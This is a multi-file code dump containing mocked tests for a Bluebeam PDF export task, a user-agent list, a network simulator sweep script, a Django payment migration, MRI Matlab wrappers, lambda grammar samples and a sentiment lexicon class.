create_submission(db, mocks.BUCKETEER_SUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = test_utils.mock_new_project_response()
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(TEST_PDF, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_with_permit_number(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
submission_data_with_permit = mocks.SUBMISSION_POST_DATA.copy()
submission_data_with_permit['building_permit_number'] = '202001011234'
# create the export
export_obj = create_export(db)
create_submission(db, submission_data_with_permit, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = test_utils.mock_new_project_response()
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_zip(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task where submission has a zip attachment"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders 2
# this mock is modified to contain today's upload folder
fake_post_responses.append(Mock())
get_folders_updated = copy.deepcopy(mocks.GET_FOLDERS_RESPONSE)
get_folders_updated['ProjectFolders'].append(
{
'$id': '8',
'Id': '1234567',
'Name': bluebeam.SUBMITTAL_DIR_NAME + " " + str(datetime.date.today()),
'Path': '/path/somewhere'
}
)
fake_post_responses[len(fake_post_responses)-1].json.return_value = get_folders_updated
# initiate upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# add user and permissions
fake_post_responses.extend(test_utils.mock_add_users_response())
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(ZIP_FILE, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
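The zip-attachment tests feed the bytes of `Archive.zip` through `requests.get(...).content`, and each member is then uploaded individually. A stdlib sketch of the part of that flow that does not depend on Bluebeam — iterating the members of an in-memory zip:

```python
import io
import zipfile

# Build a small archive in memory (stand-in for the downloaded attachment).
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, 'w') as archive:
    archive.writestr('plans/site.pdf', b'%PDF-1.4 dummy')
    archive.writestr('plans/notes.txt', b'hello')

# Re-open it from raw bytes, as if fetched over HTTP, and walk the members.
uploads = []
with zipfile.ZipFile(io.BytesIO(buffer.getvalue())) as archive:
    for name in archive.namelist():
        uploads.append((name, len(archive.read(name))))
```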
def test_export_task_new_project_zip_upload_err(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task where submission has a zip attachment
One of the uploads in zip fails.
"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders 2
# this mock is modified to contain today's upload folder
fake_post_responses.append(Mock())
get_folders_updated = copy.deepcopy(mocks.GET_FOLDERS_RESPONSE)
get_folders_updated['ProjectFolders'].append(
{
'$id': '8',
'Id': '1234567',
'Name': bluebeam.SUBMITTAL_DIR_NAME + " " + str(datetime.date.today()),
'Path': '/path/somewhere'
}
)
fake_post_responses[len(fake_post_responses)-1].json.return_value = get_folders_updated
# initiate upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1] = Exception("Generic Error")
# confirm upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(ZIP_FILE, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
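The tests above drive every outbound HTTP call from a single list handed to `side_effect`: Mock returns the items in order, and raises any item that is an exception instance. A minimal self-contained sketch of that pattern (the endpoint names are illustrative, not from the service under test):

```python
from unittest.mock import Mock

# Canned response sequence: two successful responses, then a failure.
responses = [Mock(status_code=200), Mock(status_code=204), Exception("boom")]

fake_request = Mock(side_effect=responses)

first = fake_request("POST", "/projects")   # returns responses[0]
second = fake_request("POST", "/folders")   # returns responses[1]
try:
    fake_request("PUT", "/upload")          # raises responses[2]
    failed = False
except Exception:
    failed = True

print(first.status_code, second.status_code, failed)  # 200 204 True
```

This is why replacing a list slot with an `Exception` instance, as the tests do, simulates a request blowing up mid-sequence.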
def test_export_task_delete_project_err(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task where there is an error when trying to
clean up and recover from an error
"""
print("begin test_export_task_delete_project_err")
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folder
fake_post_responses.append(Exception("Error creating folder"))
# delete project
fake_post_responses.append(Exception("Error deleting non existing project"))
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export resubmission task"""
print("begin test_export_task_resubmission")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a resubmission so there's something to export
data = mocks.RESUBMISSION_POST_DATA.copy()
data['_id'] = "ABC123"
# create the export
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 200
# get folders
fake_responses.append(Mock())
fake_responses[1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# get folders
fake_responses.append(Mock())
fake_responses[2].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_responses.append(Mock())
fake_responses[3].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_responses.append(Mock())
fake_responses[4].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_responses.append(Mock())
fake_responses[5].status_code = 200
# confirm upload
fake_responses.append(Mock())
fake_responses[6].status_code = 204
fake_responses.extend(test_utils.mock_add_users_response())
mock_reqs.side_effect = fake_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission_no_upload_dir(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export resubmission task when cannot find upload dir
in preexisting bluebeam project
"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a resubmission so there's something to export
create_submission(db, mocks.RESUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 200
# get folders
fake_responses.append(Mock())
fake_responses[1].json.return_value = mocks.GET_FOLDERS_RESPONSE_NO_UPLOAD
mock_reqs.side_effect = fake_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission_no_project(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export resubmission task but project isn't found in bluebeam"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a resubmission so there's something to export
create_submission(db, mocks.RESUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 404
mock_reqs.side_effect = fake_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_file_upload_error(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task when there is an error in uploading to bluebeam"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA.copy()
data['_id'] = "ABC123"
# create the export
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected outbound requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Exception("Generic Error"))
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_no_upload_folder(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task when there is no dir set as the uploads dir"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected outbound requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('service.resources.bluebeam.DIRECTORY_STRUCTURE') as mock_dir_structure:
mock_dir_structure.return_value = [
{"name": "CCSF EPR"}
]
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_webhook(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task new project with webhook
"""
print("begin test_export_task_new_project_webhook")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA_WEBHOOK.copy()
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# refresh token
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = test_utils.BLUEBEAM_ACCESS_TOKEN
fake_post_responses[0].status_code = 200
# create project
fake_post_responses.extend(test_utils.mock_new_project_response())
mock_post.side_effect = fake_post_responses
#patch the trigger_webhook request
with patch('tasks.requests.post') as mock_patch:
mock_patch.status_code = 200
# set an expired token to force refresh
expired_token = test_utils.BLUEBEAM_ACCESS_TOKEN.copy()
hour_past = test_utils.HOUR_FUTURE - datetime.timedelta(hours=1)
expired_token['.expires'] = hour_past.strftime("%a, %d %b %Y %H:%M:%S %Z")
bluebeam.save_auth_token(db, expired_token)
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_webhook_error(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task new project with webhook error
"""
print("begin test_export_task_new_project_webhook_error")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA_WEBHOOK.copy()
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# refresh token
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = test_utils.BLUEBEAM_ACCESS_TOKEN
fake_post_responses[0].status_code = 200
# create project
fake_post_responses.extend(test_utils.mock_new_project_response())
mock_post.side_effect = fake_post_responses
#patch the trigger_webhook request
with patch('tasks.requests.post') as mock_patch:
mock_patch.side_effect = Exception("Error")
# set an expired token to force refresh
expired_token = test_utils.BLUEBEAM_ACCESS_TOKEN.copy()
hour_past = test_utils.HOUR_FUTURE - datetime.timedelta(hours=1)
expired_token['.expires'] = hour_past.strftime("%a, %d %b %Y %H:%M:%S %Z")
bluebeam.save_auth_token(db, expired_token)
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
# File: youtubemeta/useragents.py (repo: forgetso/ytch, license: CC0-1.0)
user_agent_list = [
    # Chrome on Windows
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
    # Chrome on macOS
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
]
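A common use of such a list is rotating the `User-Agent` header per request. A minimal sketch with a shortened agent list (the helper name is illustrative; the actual `requests` call is left commented out):

```python
import random

user_agents = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
]

def pick_headers(agents):
    # Choose one agent at random for the outgoing request's headers.
    return {'User-Agent': random.choice(agents)}

headers = pick_headers(user_agents)
# requests.get('https://example.com', headers=headers)
```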
#!/usr/bin/python
# File: hring/src/Script/carpool/sweep_gather_8x8.py (repo: anderson1008/Noculator, license: MIT)
import sys
import os
def sweep_uc():
    workload_dir = "../../bin/workload_list/"
    # 64-node BLESS with gather enabled
    workload = "workloads_null"
    network_nrX = "8"
    network_nrY = "8"
    router_addrPacketSize = "1"
    router_dataPacketSize = "4"
    router_maxPacketSize = "4"
    topology = "Mesh"
    router_algorithm = "DR_FLIT_SW_OF_MC"
    randomize_defl = "true"
    adaptiveMC = "false"
    mc_degree = "0"
    scatterEnable = "false"
    multicast = "false"
    mergeEnable = "true"
    synthPattern = "HS"
    mc_rate = 0
    global out_dir, hs_rate
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    synth_rate = 0
    for sim_index in range(1, 16, 1):
        print("New Simulation!")
        out_file = "sim_" + str(sim_index) + ".out"
        synth_rate = synth_rate + 0.02
        command_line = "mono ../../bin/sim.exe -config ../../bin/workload_list/config_mc.txt -output " + out_dir + out_file + " -workload " + workload_dir + workload + " 1 -router.algorithm " + router_algorithm + " -router.addrPacketSize " + router_addrPacketSize + " -router.dataPacketSize " + router_dataPacketSize + " -router.maxPacketSize " + router_maxPacketSize + " -network_nrX " + network_nrX + " -network_nrY " + network_nrY + " -topology " + topology + " -randomize_defl " + randomize_defl + " -mc_degree " + mc_degree + " -multicast " + multicast + " -synth_rate " + str(synth_rate) + " -mc_rate " + str(mc_rate) + " -hs_rate " + str(hs_rate) + " -mergeEnable " + mergeEnable + " -adaptiveMC " + adaptiveMC + " -scatterEnable " + scatterEnable + " -synthPattern " + synthPattern
        os.system(command_line)
def sweep_hs():
    workload_dir = "../../bin/workload_list/"
    # 64-node BLESS with gather enabled
    workload = "workloads_null"
    network_nrX = "8"
    network_nrY = "8"
    router_addrPacketSize = "1"
    router_dataPacketSize = "4"
    router_maxPacketSize = "4"
    topology = "Mesh"
    router_algorithm = "DR_FLIT_SW_OF_MC"
    randomize_defl = "true"
    adaptiveMC = "false"
    mc_degree = "0"
    scatterEnable = "false"
    multicast = "false"
    mergeEnable = "true"
    synthPattern = "HS"
    mc_rate = 0
    global out_dir, synth_rate
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    hs_rate = 0
    for sim_index in range(1, 11, 1):
        print("New Simulation!")
        out_file = "sim_" + str(sim_index) + ".out"
        hs_rate = hs_rate + 0.05
        command_line = "mono ../../bin/sim.exe -config ../../bin/workload_list/config_mc.txt -output " + out_dir + out_file + " -workload " + workload_dir + workload + " 1 -router.algorithm " + router_algorithm + " -router.addrPacketSize " + router_addrPacketSize + " -router.dataPacketSize " + router_dataPacketSize + " -router.maxPacketSize " + router_maxPacketSize + " -network_nrX " + network_nrX + " -network_nrY " + network_nrY + " -topology " + topology + " -randomize_defl " + randomize_defl + " -mc_degree " + mc_degree + " -multicast " + multicast + " -synth_rate " + str(synth_rate) + " -mc_rate " + str(mc_rate) + " -hs_rate " + str(hs_rate) + " -mergeEnable " + mergeEnable + " -adaptiveMC " + adaptiveMC + " -scatterEnable " + scatterEnable + " -synthPattern " + synthPattern
        os.system(command_line)
## Sweep unicast injection rate under specified hs_rate
### hs_rate = 0.1, 0.2, 0.3, 0.4, 0.5
hs_rate = 0
for i in range(1, 6, 1):
    hs_rate = hs_rate + 0.1
    out_dir = "./preliminary/synthSweep/carpool/hotspot/uc_sweep/hs_" + str(hs_rate) + "/"
    sweep_uc()

## Sweep hotspot 0.1-0.5 with 0.05 increment
### under unicast rate of 0.1, 0.2, 0.3, 0.4, 0.5
synth_rate = 0
for i in range(1, 6, 1):
    synth_rate = synth_rate + 0.1
    out_dir = "./preliminary/synthSweep/carpool/hotspot/hs_sweep/uc_" + str(synth_rate) + "/"
    sweep_hs()
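The long `command_line` concatenations above can equally be produced from a parameter dict, which keeps each flag name next to its value. A sketch under that assumption (flag names follow the ones the script already uses; `build_command` is a hypothetical helper, not part of the original script):

```python
def build_command(binary, params):
    """Render 'binary -key value ...' from a dict of simulator options."""
    parts = [binary]
    for key, value in params.items():
        parts.append("-" + key)
        parts.append(str(value))
    return " ".join(parts)

cmd = build_command("mono ../../bin/sim.exe", {
    "config": "../../bin/workload_list/config_mc.txt",
    "network_nrX": 8,
    "network_nrY": 8,
    "synth_rate": 0.1,
})
print(cmd)
# mono ../../bin/sim.exe -config ../../bin/workload_list/config_mc.txt -network_nrX 8 -network_nrY 8 -synth_rate 0.1
```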
# File: postgresqleu/trustlypayment/migrations/0003_payment_refactor.py (repo: bradfordboyle/pgeu-system, license: MIT)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-01-13 16:18
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('invoices', '0010_payment_refector'),
        ('trustlypayment', '0002_nullamount'),
    ]

    operations = [
        migrations.RunSQL("SET CONSTRAINTS ALL IMMEDIATE"),
        migrations.AddField(
            model_name='trustlylog',
            name='paymentmethod',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
        migrations.AddField(
            model_name='trustlyrawnotification',
            name='paymentmethod',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
        migrations.AddField(
            model_name='trustlytransaction',
            name='paymentmethod',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
        migrations.RunSQL(
            "UPDATE trustlypayment_trustlylog SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
        ),
        migrations.RunSQL(
            "UPDATE trustlypayment_trustlyrawnotification SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
        ),
        migrations.RunSQL(
            "UPDATE trustlypayment_trustlytransaction SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
        ),
        migrations.AlterField(
            model_name='trustlylog',
            name='paymentmethod',
            field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
        migrations.AlterField(
            model_name='trustlyrawnotification',
            name='paymentmethod',
            field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
        migrations.AlterField(
            model_name='trustlytransaction',
            name='paymentmethod',
            field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
        ),
    ]
# File: mri_works/NodeEditor/modules/Matlab/MP3_oxygenation.py (repo: montigno/mri_works, license: CECILL-B)
class MP3_CMRO2():
    def __init__(self,
                 mat_eng='',
                 file_CBF='path',
                 file_SO2='path',
                 file_out='path',
                 **options):
        import matlab.engine
        files_in, files_out = {}, {}
        options['flag_test'] = 0
        files_in['In1'] = [file_CBF]
        files_in['In2'] = [file_SO2]
        files_out['In1'] = [file_out]
        mat_eng.Module_CMRO2(files_in, files_out, options)
        self.mat_eng = mat_eng
        self.map = file_out

    def mat_eng(self: 'str'):
        return self.mat_eng

    def file_out(self: 'path'):
        return self.map

##############################################################################

class MP3_R2Prim():
    def __init__(self,
                 mat_eng='',
                 file_T2Map='path',
                 file_T2StarCorr3D='path',
                 file_out='path',
                 **options):
        import matlab.engine
        files_in, files_out = {}, {}
        options['flag_test'] = 0
        files_in['In1'] = [file_T2Map]
        files_in['In2'] = [file_T2StarCorr3D]
        files_out['In1'] = [file_out]
        mat_eng.Module_CMRO2(files_in, files_out, options)
        self.mat_eng = mat_eng
        self.map = file_out

    def mat_eng(self: 'str'):
        return self.mat_eng

    def file_out(self: 'path'):
        return self.map

##############################################################################

class MP3_SO2():
    def __init__(self,
                 mat_eng='',
                 file_R2Prim='path',
                 file_BVf='path',
                 file_out='path',
                 **options):
        import matlab.engine
        files_in, files_out = {}, {}
        options['flag_test'] = 0
        files_in['In1'] = [file_R2Prim]
        files_in['In2'] = [file_BVf]
        files_out['In1'] = [file_out]
        mat_eng.Module_CMRO2(files_in, files_out, options)
        self.mat_eng = mat_eng
        self.map = file_out

    def mat_eng(self: 'str'):
        return self.mat_eng

    def file_out(self: 'path'):
        return self.map
# File: Python/Tests/TestData/Grammar/LambdaExpr.py (repo: techkey/PTVS, license: Apache-2.0)
lambda x : 1
lambda *x : 1
lambda **x : 1
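The three grammar cases above cover a positional parameter, a var-positional parameter, and a var-keyword parameter; each form is callable like any function:

```python
f1 = lambda x: 1        # one positional parameter
f2 = lambda *x: 1       # any number of positional arguments
f3 = lambda **x: 1      # any number of keyword arguments

results = (f1(0), f2(), f2(1, 2, 3), f3(), f3(a=1))
print(results)  # (1, 1, 1, 1, 1)
```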
# File: load_dict.py (repo: redtreeai/easy_text_emotion, license: MIT)
# -*- coding: utf-8 -*-
# @File : get_cache_demo.py
# @Author: redtree
# @Date : 18-6-27
# @Desc : A demo that preloads specific text data into cached lists. The AllList
#         instance acts as a global cache object usable by any module in the project.


class AllList():  # object holding all of the word lists
    # sentiment lexicon (English)
    positive_words_eng = []  # positive words
    negative_words_eng = []  # negative words
    level1_words_eng = []    # degree level 1
    level2_words_eng = []    # degree level 2
    level3_words_eng = []    # degree level 3
    level4_words_eng = []    # degree level 4
    level5_words_eng = []    # degree level 5
    level6_words_eng = []    # degree level 6
    fouding_words_eng = []   # negation words

    # sentiment lexicon (Chinese)
    positive_words_cn = []  # positive words
    negative_words_cn = []  # negative words
    level1_words_cn = []    # degree level 1
    level2_words_cn = []    # degree level 2
    level3_words_cn = []    # degree level 3
    level4_words_cn = []    # degree level 4
